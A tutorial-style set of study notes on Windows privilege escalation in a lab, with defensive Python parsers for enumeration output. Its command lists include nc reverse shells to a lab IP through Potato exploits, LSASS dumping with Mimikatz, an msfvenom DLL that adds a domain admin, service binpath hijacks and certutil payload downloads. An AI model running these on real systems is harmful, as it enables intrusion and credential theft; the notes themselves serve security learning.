Reference & Disclaimer
This article is based on my personal study notes from the Information Security Foundations track.
Due to scope and readability constraints, theoretical explanations, command details, output interpretation, and script code examples are intentionally highly summarized in this article.
For full explanations, complete command usage, real outputs, and detailed script implementations, readers are strongly encouraged to consult the full repository.
Full repository:
https://github.com/lameiro0x/pentesting-path-htb
Introduction
Windows privilege escalation is about moving from a low-privilege shell to local admin or SYSTEM. It often succeeds because of weak permissions, misconfigured services, or excessive group rights. This guide merges theory and commands into a practical workflow.
Workflow Overview
A reliable escalation workflow starts with enumeration, then pivots into privilege and service abuse, and finally checks kernel or patch-based options. You should prioritize low-risk misconfigurations before running exploits. This keeps the engagement stable and reduces the chance of breaking the host.
Host Enumeration
Enumeration tells you what you can do and what is likely to work. Capture network context, defense tooling, OS version, and user privileges before you attempt any exploit. Many Windows escalations are obvious once the environment is mapped.
Network and Defense Checks
Network data shows whether the host is dual-homed and which internal systems are reachable. Defense checks tell you what tools will be blocked and whether AppLocker is enforced. Use these early so you can plan safe tooling and transfer paths.
ipconfig /all
arp -a
route print
Get-MpComputerStatus
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -Path C:\Windows\System32\cmd.exe -User Everyone
System, Processes, and Users
System and process data reveal patch levels, running services, and privilege context. User and group lists show which accounts are active and which groups grant extra rights. Always capture this before you pivot to any exploit path.
systeminfo
wmic qfe
wmic product get name
set
tasklist /svc
netstat -ano
query user
whoami /priv
whoami /groups
net user
net localgroup
net localgroup "administrators"
net accounts
Named Pipes
Named pipes are a common IPC mechanism, and misconfigured pipes can allow read or write access. You can enumerate pipes and check permissions with Sysinternals tools. This is a niche path, but it can unlock service abuse and impersonation flows.
pipelist.exe /accepteula
accesschk.exe /accepteula \\.\Pipe\lsass -v
gci \\.\pipe\
Privilege Model and Tokens
Windows assigns a token to each process that defines its identity and privileges. If a user has powerful rights like SeImpersonate or SeDebug, those can be abused to execute code as SYSTEM. Understanding which privileges are enabled is critical before choosing a technique.
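As an added example (not code from the notes or the linked repository), the following Python script parses a captured `whoami /priv` listing and flags the privileges this section treats as escalation paths. It is the kind of check a hardening review runs over enumeration output collected from many hosts. The sample listing and the `HIGH_RISK` table are constructed for the example.

```python
"""Triage a captured `whoami /priv` listing for the privileges this section
treats as escalation paths.  Added example; the sample output below is
constructed, not a real capture."""
import re

# Privileges discussed on this page, with what each one lets a holder do.
# A hardening review should ask why any non-admin account holds one of these.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate another token (Potato-style attacks)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open protected processes such as LSASS",
    "SeTakeOwnershipPrivilege": "take ownership of objects and rewrite their ACLs",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}

# Constructed sample in the real `whoami /priv` layout.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeDebugPrivilege              Debug programs                            Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    Data rows follow the '=====' ruler.  Privilege names contain no spaces
    and the State column is a single word, so the first and last tokens of
    each row are the name and state; the description sits in between.
    """
    lines = text.splitlines()
    rulers = [i for i, line in enumerate(lines)
              if line.startswith("=") and re.fullmatch(r"[= ]+", line.rstrip())]
    if not rulers:
        raise ValueError("no column ruler found; not `whoami /priv` output?")
    privs = {}
    for row in lines[rulers[0] + 1:]:
        parts = row.split()
        if len(parts) < 3:
            continue  # blank or truncated row
        privs[parts[0]] = parts[-1]
    return privs


def assess(privs):
    """Return (name, state, why) for each high-risk privilege in the token.

    'Disabled' is not a mitigation: the token holder can enable the
    privilege at will, so the fix is removing the right from the account
    (or the group granting it), not relying on its current state.
    """
    return [(name, state, HIGH_RISK[name])
            for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in assess(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{name:<30} {state:<9} {why}")
```

The script reports a privilege whether its state is Enabled or Disabled, because a disabled privilege can be enabled by the process that holds it; the remediation is to remove the user right in the security policy, not to leave it disabled.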
User Privilege Abuse
User privilege abuse focuses on rights granted directly to a user account. These rights often allow impersonation, debugging, or file ownership changes that bypass normal ACLs. The sections below focus on the most common and reliable abuse paths.
SeImpersonate and Potato Attacks
SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege allow a process to impersonate another token, often SYSTEM. Potato-style attacks trick a privileged service into authenticating to a listener controlled by the attacker. The example below uses MSSQL's xp_cmdshell to launch a SYSTEM shell with JuicyPotato or PrintSpoofer.
python3 mssqlclient.py sql_dev@10.129.43.30 -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami /priv
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
nc -lnvp 8443
SeDebugPrivilege Paths
SeDebugPrivilege allows you to access protected processes and extract sensitive data. A classic path is dumping LSASS and parsing it with Mimikatz to recover hashes or plaintext. You can also spawn a SYSTEM process by creating a child process from a SYSTEM parent.
whoami /priv
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
tasklist
.\psgetsystem.ps1; [MyProcess]::CreateProcessFromParent(612, "C:\Windows\System32\cmd.exe", "")
SeTakeOwnershipPrivilege
SeTakeOwnershipPrivilege lets a user change the owner of a file or object and then grant themselves access. This is powerful for reading sensitive files that are locked by ACLs. The flow is to enable the privilege, take ownership, grant rights, and read the file.
whoami /priv
Import-Module .\Enable-Privilege.ps1
.\Enable-Privilege.ps1
takeown /f "C:\Department Shares\Private\IT\cred.txt"
icacls "C:\Department Shares\Private\IT\cred.txt" /grant htb-student:F
cat "C:\Department Shares\Private\IT\cred.txt"
Group-Based Escalation
Group rights often provide indirect privilege escalation paths. Backup Operators, DnsAdmins, and Hyper-V Admins can all lead to SYSTEM or domain-level access. Enumerate group membership and then use the specific abuse flow for each group.
Backup Operators
Backup Operators can read files regardless of ACLs and can access NTDS.dit on a domain controller. Use SeBackupPrivilege tooling to copy protected files, then extract hashes. This is a high-impact path in domain environments.
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
DnsAdmins
DnsAdmins can load a DLL into the DNS service or abuse WPAD records to intercept traffic. The DLL load path is direct privilege escalation but requires a service restart. WPAD abuse can lead to hash capture or relay attacks.
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
python3 -m http.server 7777
wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
sc stop dns
sc start dns
Hyper-V and Server Operators
Hyper-V Admins and Server Operators can often modify services or binaries that run as SYSTEM. The common pattern is to replace a service binary or change a service path, then start the service. Always verify permissions before attempting a change.
sc query type= service state= all
sc qc AppReadiness
Service Misconfigurations and UAC
Services are frequent escalation targets because they run as SYSTEM and often have weak ACLs. UAC can also be bypassed in specific scenarios when auto-elevated binaries load attacker-controlled DLLs. These paths are common and usually reliable in lab environments.
Weak Service Permissions
If a service binary is writable by Users or Everyone, you can replace it with a payload and restart the service. SharpUp and AccessChk are useful for discovering these misconfigurations. Always confirm the service runs as SYSTEM.
.\SharpUp.exe audit
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService
accesschk.exe /accepteula -quvcw WindscribeService
sc config WindscribeService binpath= "cmd /c net localgroup administrators htb-student /add"
sc stop WindscribeService
sc start WindscribeService
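An added example, not from the notes or the repository: a Python parser for icacls output like the listing checked above, which flags ACEs that grant write-capable rights to principals every standard user belongs to, and shows a hardened ACL for the same binary for contrast. The path is the one from the commands above; the ACEs in both samples are constructed.

```python
"""Flag weak ACEs in captured icacls output.  Added example; the ACEs below
are constructed (the path is the one from the commands above)."""
import re

# Principals any standard user belongs to; write access for them means any
# local account can replace the service binary.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# Simple and specific icacls rights that permit changing the file's content.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA"}

SAMPLE_PATH = r"C:\Program Files (x86)\PCProtect\SecurityService.exe"

# Constructed weak ACL: Everyone and Users hold Full control.
WEAK_ICACLS = r"""C:\Program Files (x86)\PCProtect\SecurityService.exe Everyone:(I)(F)
                                                     BUILTIN\Users:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed hardened ACL for the same binary, e.g. after
# icacls <file> /inheritance:r /grant:r "BUILTIN\Users:(RX)" ...
# Users can still run the service binary but can no longer change it.
HARDENED_ICACLS = r"""C:\Program Files (x86)\PCProtect\SecurityService.exe NT AUTHORITY\SYSTEM:(F)
                                                     BUILTIN\Administrators:(F)
                                                     BUILTIN\Users:(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(text, path):
    """Return [(principal, flags, rights)] from `icacls <path>` output.

    The first line is the path followed by its first ACE; the remaining ACEs
    are indented beneath it.  Passing the path in lets us strip it without
    guessing where a path containing spaces ends and the principal begins.
    """
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = re.fullmatch(r"(.+?):((?:\([^)]*\))+)", line)
        if not m:
            continue  # blank line or the summary line
        groups = re.findall(r"\(([^)]*)\)", m.group(2))
        # The last parenthesised group is the rights; earlier ones are flags
        # such as (I) inherited, (OI)/(CI) propagation or (DENY).
        aces.append((m.group(1), set(groups[:-1]), set(groups[-1].split(","))))
    return aces


def weak_aces(aces):
    """ACEs that let a low-privilege principal modify the file."""
    return [(who, sorted(rights)) for who, flags, rights in aces
            if who.lower() in LOW_PRIV and "DENY" not in flags
            and rights & WRITE_RIGHTS]


if __name__ == "__main__":
    for label, text in (("weak", WEAK_ICACLS), ("hardened", HARDENED_ICACLS)):
        print(label, weak_aces(parse_icacls(text, SAMPLE_PATH)))
```

Run against the weak listing it reports Everyone and BUILTIN\Users with F; against the hardened listing it reports nothing, which is the state an administrator should leave every SYSTEM service binary in.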
Unquoted Service Paths
Unquoted service paths that contain spaces are ambiguous: Windows tries the shorter candidate paths first, so a binary placed at one of those locations runs as the service. Enumerate auto-start services with unquoted paths, then check whether any directory along the path is writable by standard users. If a writable directory exists in the path, drop a payload there.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\" | findstr /i /v "\""
sc qc SystemExplorerHelpService
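An added example, not from the notes or the repository: a Python reimplementation of the findstr chain above for collected wmic output, extended to list the directories whose ACLs decide whether an unquoted path is exploitable. The service names and paths are constructed, and the `_wmic_table` helper only lays the sample out the way wmic prints its columns (in alphabetical property order).

```python
"""Audit a captured `wmic service get name,displayname,pathname,startmode`
listing for unquoted service paths.  Added example; the services below are
constructed, and the table helper only reproduces wmic's layout."""
import re


def _wmic_table(rows, widths=(28, 24, 60)):
    """Lay rows out the way wmic prints them: fixed-width columns, with the
    requested properties in alphabetical order (DisplayName, Name, PathName,
    StartMode) regardless of the order given on the command line."""
    header = ("DisplayName", "Name", "PathName", "StartMode")

    def fmt(r):
        return "".join(f"{c:<{w}}" for c, w in zip(r[:3], widths)) + r[3]
    return "\n".join([fmt(header)] + [fmt(r) for r in rows]) + "\n"


# Constructed sample: one genuinely exposed service among harmless neighbours.
SAMPLE_WMIC = _wmic_table([
    ("Acme Update Service", "AcmeUpdate",
     r"C:\Program Files\Acme Tool\svc.exe -k netsvcs", "Auto"),
    ("Backup Agent", "BackupAgent",
     r'"C:\Program Files\Backup Agent\agent.exe"', "Auto"),   # quoted: fine
    ("Legacy Monitor", "LegacyMon",
     r"C:\Tools\monitor.exe", "Auto"),                        # no spaces: fine
    ("Print Spooler", "Spooler",
     r"C:\Windows\System32\spoolsv.exe", "Auto"),             # excluded prefix
    ("Update Helper", "UpdHelper",
     r"C:\Program Files\Acme Tool\helper.exe", "Manual"),     # not auto-start
])


def parse_wmic_services(text):
    """Split fixed-width wmic output into dicts keyed by the header names.

    Column boundaries are taken from where each header word starts, which
    is how wmic aligns its rows.
    """
    lines = [line.rstrip() for line in text.splitlines() if line.strip()]
    header = lines[0]
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    bounds = list(zip(starts, starts[1:] + [None]))
    names = [header[s:e].strip() for s, e in bounds]
    return [{n: row[s:e].strip() for n, (s, e) in zip(names, bounds)}
            for row in lines[1:]]


def unquoted_path_findings(services, skip_prefix="c:\\windows\\"):
    r"""Apply the same filter as the findstr chain above and, for each hit,
    list the directories whose ACLs decide whether it matters.

    For `C:\Program Files\Acme Tool\svc.exe -k netsvcs` CreateProcess tries
    C:\Program.exe, then C:\Program Files\Acme.exe, before the intended
    binary, so C:\ and C:\Program Files\ must not be writable by standard
    users.  Quoted paths, paths without spaces, non-auto-start services and
    anything under the skip prefix are left out, as in the original command.
    """
    findings = []
    for svc in services:
        path = svc["PathName"]
        if svc["StartMode"].lower() != "auto" or path.startswith('"'):
            continue
        if path.lower().startswith(skip_prefix):
            continue
        # Only spaces inside the executable path are ambiguous, not those
        # in trailing arguments, so cut at the first ".exe".
        m = re.match(r"(.+?\.exe)", path, re.IGNORECASE)
        exe = m.group(1) if m else path
        if " " not in exe:
            continue
        words = exe.split(" ")
        dirs = {(" ".join(words[:k])).rsplit("\\", 1)[0] + "\\"
                for k in range(1, len(words))}
        findings.append({"service": svc["Name"], "path": path,
                         "check_dirs": sorted(dirs)})
    return findings


if __name__ == "__main__":
    for f in unquoted_path_findings(parse_wmic_services(SAMPLE_WMIC)):
        print(f"{f['service']}: {f['path']}")
        for d in f["check_dirs"]:
            print(f"    verify ACL of {d}")
```

The fix for a reported service is to quote the path in its configuration (`sc config <name> binpath= "\"C:\Program Files\...\svc.exe\""`) and to confirm that the listed directories only grant write access to administrators.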
UAC Auto-Elevate Checks
UAC bypasses often depend on auto-elevated binaries and DLL search order. Start by confirming UAC status and the current token, then check for writable directories in PATH. Only attempt UAC bypasses when you are already a local admin.
whoami /user
whoami /priv
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
Credential Hunting
Credential hunting is often faster than complex exploitation. Look in config files, PowerShell history, saved credentials, and common locations like user profiles. Credential reuse can unlock lateral movement or immediate admin access.
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Include *.config,*.xml,*.ini,*.txt
Get-Content $Env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cmdkey /list
netsh wlan show profiles
File Transfer and Looting
You will often need to move tools onto the host and exfiltrate artifacts like dumps or hives. SMB servers and simple HTTP PUT/POST servers are fast and reliable in labs. Keep transfers in writable locations like C:\Windows\Temp or C:\Users\Public.
mkdir /tmp/share
cp tool.exe /tmp/share/
sudo python3 smbserver.py share /tmp/share/ -smb2support
copy \\10.10.14.143\share\tool.exe C:\Users\Public\
certutil -urlcache -f http://10.10.14.3/tool.exe C:\Users\Public\tool.exe
Kernel and Patch Checks
Kernel exploits are high risk and should be used only when version and patch level match. First enumerate OS and patches, then decide if a known CVE is worth attempting. HiveNightmare and PrintNightmare are common examples on outdated systems.
systeminfo
wmic qfe
icacls C:\Windows\System32\config\SAM
Common Tooling
These tools speed up enumeration and privilege escalation checks. Choose based on what the environment allows and what you can transfer safely. Use them as complements to manual checks.
- Seatbelt
- winPEAS
- PowerUp / SharpUp
- JAWS
- Watson
- LaZagne
- Sysinternals Suite (AccessChk, PsService, PipeList)
Hardening Notes
Privilege escalation succeeds when patching and configuration hygiene are weak. Keep systems updated, reduce unnecessary local admin rights, and lock down service permissions and startup paths. Audit regularly and enforce AppLocker or WDAC where possible.